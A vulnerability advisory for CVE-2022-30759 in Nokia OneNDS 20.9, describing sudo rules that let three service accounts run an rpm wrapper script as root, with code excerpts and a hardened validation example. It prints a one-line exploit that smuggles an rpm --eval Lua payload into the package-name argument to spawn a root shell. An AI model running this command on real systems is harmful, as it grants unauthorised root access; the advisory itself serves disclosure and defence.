Nokia OneNDS 20.9 Insecure Permissions / Privilege Escalation
Nokia OneNDS 20.9 has loose sudo permissions that can allow users to escalate privileges.
===============================================================================
title: Incorrect Permission Assignment
product: Nokia OneNDS 20.9
vulnerability type: Security Misconfiguration
severity: High
CVSS Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
found on: 04/05/2022
by: Giacomo Sighinolfi <[email protected]>
cve: CVE-2022-30759
===============================================================================

Some sudo permissions can be exploited by some users to escalate to root privileges and execute arbitrary commands on the system.

The affected users are: Provgw, notifs, dbmrun (system users)

They can run the following script as root:
/opt/cntdb/bin/noscripts_rpm.sh

It can be exploited with:
sudo /opt/cntdb/bin/noscripts_rpm.sh force-erase "--eval '%{lua:os.execute(\"/bin/sh\")}'"

===============================================================================
Detailed analysis:

The script accepts as its first argument one of these options:
install|update|fallback|erase|test-install|test-update|test-erase|
force-install|force-update|force-erase
and as a second argument an arbitrary rpm package name.

If we analyze the switch case code block (row 175) we can see how the first argument influences the execution of the script.

175. case "$1" in
…
224. test-erase)
225. TEST_OPTION="--test"
226. OPTION="-e"
227. ;;
…
238. force-erase)
239. TEST_OPTION="--nodeps"
240. OPTION="-e"
241. ;;
…

Using "force-erase" or "test-erase" as the first argument sets the "OPTION" variable to "-e". That value allows us to trigger a privilege escalation through the rpm command (row 254) by passing a particular rpm package name to the script as the second parameter.

…
252. if [ $OPTION == "-e" ]
253. then
254. rpm $OPTION --noscripts $TEST_OPTION $2
…
===============================================================================
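Row 254 hands $2 to rpm unquoted and unvalidated while the script runs as root, so a value that looks like an option is parsed by rpm as one. A hardened form of that erase path, as an added example that is not Nokia's code (is_safe_pkg_name, safe_erase and RPM_CMD are hypothetical names, and the character allow-list is an assumption about acceptable package names):

```shell
#!/bin/sh
# Added example, not vendor code. Function names and RPM_CMD are hypothetical.

RPM_CMD=${RPM_CMD:-rpm}   # overridable so the logic can be exercised without rpm

# Accept only characters expected in an rpm package name (assumed allow-list).
is_safe_pkg_name() {
    case "$1" in
        ''|-*)              return 1 ;;  # empty, or would be parsed as an option
        *[!A-Za-z0-9._+-]*) return 1 ;;  # whitespace, quotes, %, braces, ...
    esac
    return 0
}

# Erase a package in one of the two erase modes quoted in the advisory.
# Returns 2 without invoking rpm when either argument is rejected.
safe_erase() {
    case "$1" in
        test-erase)  test_option="--test" ;;
        force-erase) test_option="--nodeps" ;;
        *) echo "unsupported mode" >&2; return 2 ;;
    esac
    if ! is_safe_pkg_name "$2"; then
        echo "rejected package name" >&2
        return 2
    fi
    # Every expansion is quoted, so the name reaches rpm as exactly one argument.
    "$RPM_CMD" -e --noscripts "$test_option" "$2"
}
```

Validation happens before rpm is reached, so a rejected name never becomes part of a root command line; the sudoers entry that exposes the script to the service accounts still needs its own review.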
Related news
CVE-2022-30759: Nokia OneNDS 20.9 Insecure Permissions
In Nokia One-NDS (aka Network Directory Server) through 20.9, some Sudo permissions can be exploited by some users to escalate to root privileges and execute arbitrary commands.